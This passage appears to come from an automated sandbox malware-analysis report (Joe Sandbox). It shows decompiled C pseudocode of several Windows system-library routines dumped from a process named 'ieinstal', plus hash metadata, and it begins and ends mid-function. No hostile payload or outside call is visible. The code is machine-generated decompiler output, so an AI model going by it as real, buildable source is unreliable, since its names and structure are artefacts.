                        										if( *0x1edf8474 != 3) {
                        											 *0x1edf79dc =  *0x1edf79dc + 1;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						goto L52;
                        					}
                        					if(E1ED27D50() != 0) {
                        						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t83 = 0x7ffe0384;
                        					}
                        					if( *_t83 != 0) {
                        						_t84 =  *[fs:0x30];
                        						__eflags =  *(_t84 + 0x240) & 0x00000004;
                        						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                        							_t94 = E1ED27D50();
                        							__eflags = _t94;
                        							if(_t94 == 0) {
                        								_t95 = 0x7ffe0385;
                        							} else {
                        								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t95 & 0x00000020;
                        							if(( *_t95 & 0x00000020) != 0) {
                        								E1ED87016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                        						if( *0x1edf8708 != 0) {
                        							_t118 =  *0x7ffe0330;
                        							_t123 =  *0x1edf7b00; // 0x0
                        							asm("ror esi, cl");
                        							 *0x1edfb1e0(_v12, _v20, 0x20);
                        							_t93 =  *(_t123 ^  *0x7ffe0330)();
                        							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                        							asm("sbb esi, esi");
                        							_t120 =  ~_t50 & _t93;
                        						} else {
                        							_t120 = 0;
                        						}
                        					}
                        					if( !_t120 >= 0) {
                        						L19:
                        						_push( *_t105);
                        						E1ED495D0();
                        						 *_t105 =  *_t105 & 0x00000000;
                        						goto L20;
                        					}
                        					_t120 = E1ED17F65(_t119);
                        					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                        						__eflags = _t120;
                        						if(_t120 < 0) {
                        							goto L19;
                        						}
                        						 *(_t119 + 0x64) = _v12;
                        						goto L22;
                        					}
                        					goto L19;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80e90ad65d7e1d03b81f838fe492f276909af562bbaf2a64c3f3fe6fdce3c849
                        • Instruction ID: fcec4c2664b09c03c175cfff76e255d5463c281402c33a1e225ff3ddca896208
                        • Opcode Fuzzy Hash: 80e90ad65d7e1d03b81f838fe492f276909af562bbaf2a64c3f3fe6fdce3c849
                        • Instruction Fuzzy Hash: 89918C71E00295AFEB22CB69C854B9E7BB6EF01728F250361E991EB2D0DB74DD00C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E1ED0C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				char _v1036;
                        				signed int _v1040;
                        				char _v1048;
                        				signed int _v1052;
                        				signed char _v1056;
                        				void* _v1058;
                        				char _v1060;
                        				signed int _v1064;
                        				void* _v1068;
                        				intOrPtr _v1072;
                        				void* _v1084;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t70;
                        				intOrPtr _t72;
                        				signed int _t74;
                        				intOrPtr _t77;
                        				signed int _t78;
                        				signed int _t81;
                        				void* _t101;
                        				signed int _t102;
                        				signed int _t107;
                        				signed int _t109;
                        				signed int _t110;
                        				signed char _t111;
                        				signed int _t112;
                        				signed int _t113;
                        				signed int _t114;
                        				intOrPtr _t116;
                        				void* _t117;
                        				char _t118;
                        				void* _t120;
                        				char _t121;
                        				signed int _t122;
                        				signed int _t123;
                        				signed int _t125;
                        
                        				_t125 = (_t123 & 0xfffffff8) - 0x424;
                        				_v8 =  *0x1edfd360 ^ _t125;
                        				_t116 = _a4;
                        				_v1056 = _a16;
                        				_v1040 = _a24;
                        				if(E1ED16D30( &_v1048, _a8) < 0) {
                        					L4:
                        					_pop(_t117);
                        					_pop(_t120);
                        					_pop(_t101);
                        					return E1ED4B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                        				}
                        				_t70 = _a20;
                        				if(_t70 >= 0x3f4) {
                        					_t121 = _t70 + 0xc;
                        					L19:
                        					_t107 =  *( *[fs:0x30] + 0x18);
                        					__eflags = _t107;
                        					if(_t107 == 0) {
                        						L60:
                        						_t68 = 0xc0000017;
                        						goto L4;
                        					}
                        					_t72 =  *0x1edf7b9c; // 0x0
                        					_t74 = L1ED24620(_t107, _t107, _t72 + 0x180000, _t121);
                        					_v1064 = _t74;
                        					__eflags = _t74;
                        					if(_t74 == 0) {
                        						goto L60;
                        					}
                        					_t102 = _t74;
                        					_push( &_v1060);
                        					_push(_t121);
                        					_push(_t74);
                        					_push(2);
                        					_push( &_v1048);
                        					_push(_t116);
                        					_t122 = E1ED49650();
                        					__eflags = _t122;
                        					if(_t122 >= 0) {
                        						L7:
                        						_t114 = _a12;
                        						__eflags = _t114;
                        						if(_t114 != 0) {
                        							_t77 = _a20;
                        							L26:
                        							_t109 =  *(_t102 + 4);
                        							__eflags = _t109 - 3;
                        							if(_t109 == 3) {
                        								L55:
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									L59:
                        									_t122 = 0xc0000024;
                        									L15:
                        									_t78 = _v1052;
                        									__eflags = _t78;
                        									if(_t78 != 0) {
                        										L1ED277F0( *( *[fs:0x30] + 0x18), 0, _t78);
                        									}
                        									_t68 = _t122;
                        									goto L4;
                        								}
                        								_t110 = _v1056;
                        								_t118 =  *((intOrPtr*)(_t102 + 8));
                        								_v1060 = _t118;
                        								__eflags = _t110;
                        								if(_t110 == 0) {
                        									L10:
                        									_t122 = 0x80000005;
                        									L11:
                        									_t81 = _v1040;
                        									__eflags = _t81;
                        									if(_t81 == 0) {
                        										goto L15;
                        									}
                        									__eflags = _t122;
                        									if(_t122 >= 0) {
                        										L14:
                        										 *_t81 = _t118;
                        										goto L15;
                        									}
                        									__eflags = _t122 - 0x80000005;
                        									if(_t122 != 0x80000005) {
                        										goto L15;
                        									}
                        									goto L14;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                        								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                        									goto L10;
                        								}
                        								_push( *((intOrPtr*)(_t102 + 8)));
                        								_t59 = _t102 + 0xc; // 0xc
                        								_push(_t110);
                        								L54:
                        								E1ED4F3E0();
                        								_t125 = _t125 + 0xc;
                        								goto L11;
                        							}
                        							__eflags = _t109 - 7;
                        							if(_t109 == 7) {
                        								goto L55;
                        							}
                        							_t118 = 4;
                        							__eflags = _t109 - _t118;
                        							if(_t109 != _t118) {
                        								__eflags = _t109 - 0xb;
                        								if(_t109 != 0xb) {
                        									__eflags = _t109 - 1;
                        									if(_t109 == 1) {
                        										__eflags = _t114 - _t118;
                        										if(_t114 != _t118) {
                        											_t118 =  *((intOrPtr*)(_t102 + 8));
                        											_v1060 = _t118;
                        											__eflags = _t118 - _t77;
                        											if(_t118 > _t77) {
                        												goto L10;
                        											}
                        											_push(_t118);
                        											_t56 = _t102 + 0xc; // 0xc
                        											_push(_v1056);
                        											goto L54;
                        										}
                        										__eflags = _t77 - _t118;
                        										if(_t77 != _t118) {
                        											L34:
                        											_t122 = 0xc0000004;
                        											goto L15;
                        										}
                        										_t111 = _v1056;
                        										__eflags = _t111 & 0x00000003;
                        										if((_t111 & 0x00000003) == 0) {
                        											_v1060 = _t118;
                        											__eflags = _t111;
                        											if(__eflags == 0) {
                        												goto L10;
                        											}
                        											_t42 = _t102 + 0xc; // 0xc
                        											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                        											_v1048 =  *((intOrPtr*)(_t102 + 8));
                        											_push(_t111);
                        											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                        											_push(0);
                        											_push( &_v1048);
                        											_t122 = E1ED413C0(_t102, _t118, _t122, __eflags);
                        											L44:
                        											_t118 = _v1072;
                        											goto L11;
                        										}
                        										_t122 = 0x80000002;
                        										goto L15;
                        									}
                        									_t122 = 0xc0000024;
                        									goto L44;
                        								}
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									goto L59;
                        								}
                        								_t118 = 8;
                        								__eflags = _t77 - _t118;
                        								if(_t77 != _t118) {
                        									goto L34;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        									goto L34;
                        								}
                        								_t112 = _v1056;
                        								_v1060 = _t118;
                        								__eflags = _t112;
                        								if(_t112 == 0) {
                        									goto L10;
                        								}
                        								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                        								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                        								goto L11;
                        							}
                        							__eflags = _t114 - _t118;
                        							if(_t114 != _t118) {
                        								goto L59;
                        							}
                        							__eflags = _t77 - _t118;
                        							if(_t77 != _t118) {
                        								goto L34;
                        							}
                        							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        								goto L34;
                        							}
                        							_t113 = _v1056;
                        							_v1060 = _t118;
                        							__eflags = _t113;
                        							if(_t113 == 0) {
                        								goto L10;
                        							}
                        							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                        							goto L11;
                        						}
                        						_t118 =  *((intOrPtr*)(_t102 + 8));
                        						__eflags = _t118 - _a20;
                        						if(_t118 <= _a20) {
                        							_t114 =  *(_t102 + 4);
                        							_t77 = _t118;
                        							goto L26;
                        						}
                        						_v1060 = _t118;
                        						goto L10;
                        					}
                        					__eflags = _t122 - 0x80000005;
                        					if(_t122 != 0x80000005) {
                        						goto L15;
                        					}
                        					L1ED277F0( *( *[fs:0x30] + 0x18), 0, _t102);
                        					L18:
                        					_t121 = _v1060;
                        					goto L19;
                        				}
                        				_push( &_v1060);
                        				_push(0x400);
                        				_t102 =  &_v1036;
                        				_push(_t102);
                        				_push(2);
                        				_push( &_v1048);
                        				_push(_t116);
                        				_t122 = E1ED49650();
                        				if(_t122 >= 0) {
                        					__eflags = 0;
                        					_v1052 = 0;
                        					goto L7;
                        				}
                        				if(_t122 == 0x80000005) {
                        					goto L18;
                        				}
                        				goto L4;
                        			}










































                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d14d35c2282540fed27bc1a63fd17a0642118a63abc53b67e5b731095cc0c35
                        • Instruction ID: 073bc940f385da74c8ea18edeee6542f340890cbe0ee69063a006437e8dd56f4
                        • Opcode Fuzzy Hash: 2d14d35c2282540fed27bc1a63fd17a0642118a63abc53b67e5b731095cc0c35
                        • Instruction Fuzzy Hash: 8481A075A142428BDB11CF14C890A6B77E6EF84259F164F2EFD899B244E330ED45CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E1ED86DC9(signed int __ecx, void* __edx) {
                        				unsigned int _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				char _v32;
                        				char _v36;
                        				char _v40;
                        				char _v44;
                        				char _v48;
                        				char _v52;
                        				char _v56;
                        				char _v60;
                        				void* _t87;
                        				void* _t95;
                        				signed char* _t96;
                        				signed int _t107;
                        				signed int _t136;
                        				signed char* _t137;
                        				void* _t157;
                        				void* _t161;
                        				void* _t167;
                        				intOrPtr _t168;
                        				void* _t174;
                        				void* _t175;
                        				signed int _t176;
                        				void* _t177;
                        
                        				_t136 = __ecx;
                        				_v44 = 0;
                        				_t167 = __edx;
                        				_v40 = 0;
                        				_v36 = 0;
                        				_v32 = 0;
                        				_v60 = 0;
                        				_v56 = 0;
                        				_v52 = 0;
                        				_v48 = 0;
                        				_v16 = __ecx;
                        				_t87 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                        				_t175 = _t87;
                        				if(_t175 != 0) {
                        					_t11 = _t175 + 0x30; // 0x30
                        					 *((short*)(_t175 + 6)) = 0x14d4;
                        					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                        					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                        					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                        					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                        					E1ED86B4C(_t167, _t11, 0x214,  &_v8);
                        					_v12 = _v8 + 0x10;
                        					_t95 = E1ED27D50();
                        					_t137 = 0x7ffe0384;
                        					if(_t95 == 0) {
                        						_t96 = 0x7ffe0384;
                        					} else {
                        						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t175);
                        					_push(_v12);
                        					_push(0x402);
                        					_push( *_t96 & 0x000000ff);
                        					E1ED49AE0();
                        					_t87 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                        					_t176 = _v16;
                        					if((_t176 & 0x00000100) != 0) {
                        						_push( &_v36);
                        						_t157 = 4;
                        						_t87 = E1ED8795D( *((intOrPtr*)(_t167 + 8)), _t157);
                        						if(_t87 >= 0) {
                        							_v24 = E1ED8795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                        							_v28 = E1ED8795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                        							_push( &_v52);
                        							_t161 = 5;
                        							_t168 = E1ED8795D( *((intOrPtr*)(_t167 + 8)), _t161);
                        							_v20 = _t168;
                        							_t107 = L1ED24620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                        							_v16 = _t107;
                        							if(_t107 != 0) {
                        								_v8 = _v8 & 0x00000000;
                        								 *(_t107 + 0x20) = _t176;
                        								 *((short*)(_t107 + 6)) = 0x14d5;
                        								_t47 = _t107 + 0x24; // 0x24
                        								_t177 = _t47;
                        								E1ED86B4C( &_v36, _t177, 0xc78,  &_v8);
                        								_t51 = _v8 + 4; // 0x4
                        								_t178 = _t177 + (_v8 >> 1) * 2;
                        								_v12 = _t51;
                        								E1ED86B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_v12 = _v12 + _v8;
                        								E1ED86B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_t125 = _v8;
                        								_v12 = _v12 + _v8;
                        								E1ED86B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                        								_t174 = _v12 + _v8;
                        								if(E1ED27D50() != 0) {
                        									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        								}
                        								_push(_v16);
                        								_push(_t174);
                        								_push(0x402);
                        								_push( *_t137 & 0x000000ff);
                        								E1ED49AE0();
                        								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                        								_t168 = _v20;
                        							}
                        							_t87 = L1ED22400( &_v36);
                        							if(_v24 >= 0) {
                        								_t87 = L1ED22400( &_v44);
                        							}
                        							if(_t168 >= 0) {
                        								_t87 = L1ED22400( &_v52);
                        							}
                        							if(_v28 >= 0) {
                        								return L1ED22400( &_v60);
                        							}
                        						}
                        					}
                        				}
                        				return _t87;
                        			}































                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction ID: 7515eb7f209399422dd928ff8d5128e9781cf4d8f0c215d0c6d1d80e7ede473b
                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction Fuzzy Hash: CB715875A00249EFCB11CFA5C980EAEBBB9FF48714F114669E505E7290DB34FA41CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E1ED9B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t80;
                        				signed int _t83;
                        				intOrPtr _t89;
                        				signed int _t92;
                        				signed char _t106;
                        				signed int* _t107;
                        				intOrPtr _t108;
                        				intOrPtr _t109;
                        				signed int _t114;
                        				void* _t115;
                        				void* _t117;
                        				void* _t119;
                        				void* _t122;
                        				signed int _t123;
                        				signed int* _t124;
                        
                        				_t106 = _a12;
                        				if((_t106 & 0xfffffffc) != 0) {
                        					return 0xc000000d;
                        				}
                        				if((_t106 & 0x00000002) != 0) {
                        					_t106 = _t106 | 0x00000001;
                        				}
                        				_t109 =  *0x1edf7b9c; // 0x0
                        				_t124 = L1ED24620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                        				if(_t124 != 0) {
                        					 *_t124 =  *_t124 & 0x00000000;
                        					_t124[1] = _t124[1] & 0x00000000;
                        					_t124[4] = _t124[4] & 0x00000000;
                        					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                        						L13:
                        						_push(_t124);
                        						if((_t106 & 0x00000002) != 0) {
                        							_push(0x200);
                        							_push(0x28);
                        							_push(0xffffffff);
                        							_t122 = E1ED49800();
                        							if(_t122 < 0) {
                        								L33:
                        								if((_t124[4] & 0x00000001) != 0) {
                        									_push(4);
                        									_t64 =  &(_t124[1]); // 0x4
                        									_t107 = _t64;
                        									_push(_t107);
                        									_push(5);
                        									_push(0xfffffffe);
                        									E1ED495B0();
                        									if( *_t107 != 0) {
                        										_push( *_t107);
                        										E1ED495D0();
                        									}
                        								}
                        								_push(_t124);
                        								_push(0);
                        								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        								L37:
                        								L1ED277F0();
                        								return _t122;
                        							}
                        							_t124[4] = _t124[4] | 0x00000002;
                        							L18:
                        							_t108 = _a8;
                        							_t29 =  &(_t124[0x105]); // 0x414
                        							_t80 = _t29;
                        							_t30 =  &(_t124[5]); // 0x14
                        							_t124[3] = _t80;
                        							_t123 = 0;
                        							_t124[2] = _t30;
                        							 *_t80 = _t108;
                        							if(_t108 == 0) {
                        								L21:
                        								_t112 = 0x400;
                        								_push( &_v8);
                        								_v8 = 0x400;
                        								_push(_t124[2]);
                        								_push(0x400);
                        								_push(_t124[3]);
                        								_push(0);
                        								_push( *_t124);
                        								_t122 = E1ED49910();
                        								if(_t122 != 0xc0000023) {
                        									L26:
                        									if(_t122 != 0x106) {
                        										L40:
                        										if(_t122 < 0) {
                        											L29:
                        											_t83 = _t124[2];
                        											if(_t83 != 0) {
                        												_t59 =  &(_t124[5]); // 0x14
                        												if(_t83 != _t59) {
                        													L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                        												}
                        											}
                        											_push( *_t124);
                        											E1ED495D0();
                        											goto L33;
                        										}
                        										 *_a16 = _t124;
                        										return 0;
                        									}
                        									if(_t108 != 1) {
                        										_t122 = 0;
                        										goto L40;
                        									}
                        									_t122 = 0xc0000061;
                        									goto L29;
                        								} else {
                        									goto L22;
                        								}
                        								while(1) {
                        									L22:
                        									_t89 =  *0x1edf7b9c; // 0x0
                        									_t92 = L1ED24620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                        									_t124[2] = _t92;
                        									if(_t92 == 0) {
                        										break;
                        									}
                        									_t112 =  &_v8;
                        									_push( &_v8);
                        									_push(_t92);
                        									_push(_v8);
                        									_push(_t124[3]);
                        									_push(0);
                        									_push( *_t124);
                        									_t122 = E1ED49910();
                        									if(_t122 != 0xc0000023) {
                        										goto L26;
                        									}
                        									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                        								}
                        								_t122 = 0xc0000017;
                        								goto L26;
                        							}
                        							_t119 = 0;
                        							do {
                        								_t114 = _t124[3];
                        								_t119 = _t119 + 0xc;
                        								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                        								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                        								_t123 = _t123 + 1;
                        								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                        							} while (_t123 < _t108);
                        							goto L21;
                        						}
                        						_push(0x28);
                        						_push(3);
                        						_t122 = E1ED0A7B0();
                        						if(_t122 < 0) {
                        							goto L33;
                        						}
                        						_t124[4] = _t124[4] | 0x00000001;
                        						goto L18;
                        					}
                        					if((_t106 & 0x00000001) == 0) {
                        						_t115 = 0x28;
                        						_t122 = E1ED9E7D3(_t115, _t124);
                        						if(_t122 < 0) {
                        							L9:
                        							_push(_t124);
                        							_push(0);
                        							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        							goto L37;
                        						}
                        						L12:
                        						if( *_t124 != 0) {
                        							goto L18;
                        						}
                        						goto L13;
                        					}
                        					_t15 =  &(_t124[1]); // 0x4
                        					_t117 = 4;
                        					_t122 = E1ED9E7D3(_t117, _t15);
                        					if(_t122 >= 0) {
                        						_t124[4] = _t124[4] | 0x00000001;
                        						_v12 = _v12 & 0x00000000;
                        						_push(4);
                        						_push( &_v12);
                        						_push(5);
                        						_push(0xfffffffe);
                        						E1ED495B0();
                        						goto L12;
                        					}
                        					goto L9;
                        				} else {
                        					return 0xc0000017;
                        				}
                        			}





















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd

                        C-Code - Quality: 78%
                        			E1ED052A5(char __ecx) {
                        				char _v20;
                        				char _v28;
                        				char _v29;
                        				void* _v32;
                        				void* _v36;
                        				void* _v37;
                        				void* _v38;
                        				void* _v40;
                        				void* _v46;
                        				void* _v64;
                        				void* __ebx;
                        				intOrPtr* _t49;
                        				signed int _t53;
                        				short _t85;
                        				signed int _t87;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t101;
                        				intOrPtr* _t102;
                        				intOrPtr* _t104;
                        				signed int _t106;
                        				void* _t108;
                        
                        				_t93 = __ecx;
                        				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                        				_push(_t88);
                        				_v29 = __ecx;
                        				_t89 = _t88 | 0xffffffff;
                        				while(1) {
                        					E1ED1EEF0(0x1edf79a0);
                        					_t104 =  *0x1edf8210; // 0x2fb2dd8
                        					if(_t104 == 0) {
                        						break;
                        					}
                        					asm("lock inc dword [esi]");
                        					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                        					E1ED1EB70(_t93, 0x1edf79a0);
                        					if( *((char*)(_t108 + 0xf)) != 0) {
                        						_t101 =  *0x7ffe02dc;
                        						__eflags =  *(_t104 + 0x14) & 0x00000001;
                        						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                        							L9:
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0x90028);
                        							_push(_t108 + 0x20);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push( *((intOrPtr*)(_t104 + 4)));
                        							_t53 = E1ED49890();
                        							__eflags = _t53;
                        							if(_t53 >= 0) {
                        								__eflags =  *(_t104 + 0x14) & 0x00000001;
                        								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                        									E1ED1EEF0(0x1edf79a0);
                        									 *((intOrPtr*)(_t104 + 8)) = _t101;
                        									E1ED1EB70(0, 0x1edf79a0);
                        								}
                        								goto L3;
                        							}
                        							__eflags = _t53 - 0xc0000012;
                        							if(__eflags == 0) {
                        								L12:
                        								_t13 = _t104 + 0xc; // 0x2fb2de5
                        								_t93 = _t13;
                        								 *((char*)(_t108 + 0x12)) = 0;
                        								__eflags = E1ED3F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								if(__eflags >= 0) {
                        									L15:
                        									_t102 = _v28;
                        									 *_t102 = 2;
                        									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        									E1ED1EEF0(0x1edf79a0);
                        									__eflags =  *0x1edf8210 - _t104; // 0x2fb2dd8
                        									if(__eflags == 0) {
                        										__eflags =  *((char*)(_t108 + 0xe));
                        										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                        										 *0x1edf8210 = _t102;
                        										_t32 = _t102 + 0xc; // 0x0
                        										 *_t95 =  *_t32;
                        										_t33 = _t102 + 0x10; // 0x0
                        										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                        										_t35 = _t102 + 4; // 0xffffffff
                        										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                        										if(__eflags != 0) {
                        											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                        											E1ED84888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                        										}
                        										E1ED1EB70(_t95, 0x1edf79a0);
                        										asm("lock xadd [esi], eax");
                        										if(__eflags == 0) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E1ED495D0();
                        											L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										asm("lock xadd [esi], ebx");
                        										__eflags = _t89 == 1;
                        										if(_t89 == 1) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E1ED495D0();
                        											L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										_t49 = _t102;
                        										L4:
                        										return _t49;
                        									}
                        									E1ED1EB70(_t93, 0x1edf79a0);
                        									asm("lock xadd [esi], eax");
                        									if(__eflags == 0) {
                        										_push( *((intOrPtr*)(_t104 + 4)));
                        										E1ED495D0();
                        										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        									}
                        									 *_t102 = 1;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										_t28 = _t102 + 4; // 0xffffffff
                        										_push( *_t28);
                        										E1ED495D0();
                        										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                        									}
                        									continue;
                        								}
                        								_t93 =  &_v20;
                        								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                        								_t85 = 6;
                        								_v20 = _t85;
                        								_t87 = E1ED3F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								__eflags = _t87;
                        								if(_t87 < 0) {
                        									goto L3;
                        								}
                        								 *((char*)(_t108 + 0xe)) = 1;
                        								goto L15;
                        							}
                        							__eflags = _t53 - 0xc000026e;
                        							if(__eflags != 0) {
                        								goto L3;
                        							}
                        							goto L12;
                        						}
                        						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                        						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                        							goto L3;
                        						} else {
                        							goto L9;
                        						}
                        					}
                        					L3:
                        					_t49 = _t104;
                        					goto L4;
                        				}
                        				_t49 = 0;
                        				goto L4;
                        			}


























                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd

                        C-Code - Quality: 100%
                        			E1ED32AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                        				signed short* _v8;
                        				signed short* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr* _v28;
                        				signed int _v32;
                        				signed int _v36;
